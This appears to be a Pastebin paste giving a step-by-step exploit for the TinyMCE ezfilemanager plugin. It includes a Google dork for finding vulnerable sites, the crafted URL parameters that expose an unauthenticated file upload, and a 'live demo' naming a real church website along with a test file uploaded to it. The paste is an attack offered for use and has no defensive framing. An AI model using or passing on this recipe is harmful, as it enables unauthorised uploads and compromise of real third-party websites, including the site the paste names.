Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Modify this dork for getting mor results from Google =)
- Google Dork inurl:ezfilemanager/ezfilemanager.php
- Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
- Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
- put ?sa=1&type=file after URL
- now url will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
- Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
- Live Demo : http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
- Result : http://www.monumentbiblechurch.com/mbcphotos/files/aaaaaaaa.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement